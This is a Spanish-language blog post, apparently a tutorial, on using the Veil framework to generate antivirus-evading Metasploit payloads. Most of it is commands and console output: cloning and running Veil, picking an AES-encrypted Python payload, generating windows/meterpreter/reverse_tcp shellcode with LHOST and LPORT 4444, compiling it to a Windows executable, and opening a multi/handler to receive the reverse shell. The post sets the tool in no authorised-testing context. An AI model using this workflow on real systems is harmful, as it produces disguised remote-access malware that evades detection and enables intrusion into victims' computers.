Veil – Evasión de Antivirus
Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.
Descarga Veil:
git clone https://github.com/ChrisTruncer/Veil cd Veil python Veil.py
Veil Modo de Uso
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py ========================================================================= Veil First Run Detected... Initializing Script Setup... ========================================================================= [*] Executing ./config/update.py... [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf [*] OPERATING_SYSTEM = Linux [*] TERMINAL_CLEAR = clear [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/ [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/ [*] Path '/root/veil-output/source/' Created [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/ [*] Path '/ro ot/veil-output/compiled/' Created [*] TEMP_DIR = /tmp/ [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/ [*] MSFVENOM_OPTIONS = [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Main Menu 18 payloads loaded Available commands: use use a specific payload update update Veil to the latest version list list available languages/payloads info information on a specific payload exit exit Veil [>] Please enter a command: list ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Available payloads: 1) c/VirtualAlloc Poor 2) c/VoidPointer Poor 3) c#/VirtualAlloc Poor 4) c#/b64SubVirtualAlloc Normal 5) native/BackdoorFactory Normal 6) native/hyperion Normal 7) native/pescrambler Normal 8) powershell/DownloadVirtualAlloc Excellent 9) powershell/PsexecVirtualAlloc Excellent 10) powershell/VirtualAlloc Excellent 11) python/AESEncrypted Excellent 12) python/ARCEncrypted Excellent 13) python/Base64Encode Excellent 14) python/DESEncrypted Excellent 15) python/FlatInjection Normal 16) python/LetterSubstitution Excellent 17) python/MeterHTTPContained Excellent 18) python/MeterHTTPSContained Excellent [>] Please enter a command: 11 ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= Payload: python/AESEncrypted loaded Required Options: Name Current Value Description ---- ------------- ----------- compile_to_exe Y Compile to an executable inject_method virtual [virtual]alloc or [void]pointer use_pyherion N Use the pyherion encrypter Available commands: set set a specific option value info show information about the payload help [crypters] show help menu for payload or crypters generate generate payload exit exit Veil back go to the main menu [>] Please enter a command: generate ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 [*] Press [enter] for windows/meterpreter/reverse_tcp [*] Press [tab] to list available payloads [>] Please enter metasploit payload: [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx [>] Enter value for 'LPORT': 4444 [>] Enter extra msfvenom options in OPTION=value syntax: [*] Generating shellcode... ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Py2Exe [>] Please enter the number of your choice: 1Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado.
Ahora abrimos Metasploit:
msf> use exploit/multi/handler msf exploit(handler) > exploit
Veil - AV Evasion
Posted By César Calderón
Amante de todo lo relacionado con la informática, GNU/Linux, Programador, Geek. Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores.
0 comentarios:
Publicar un comentario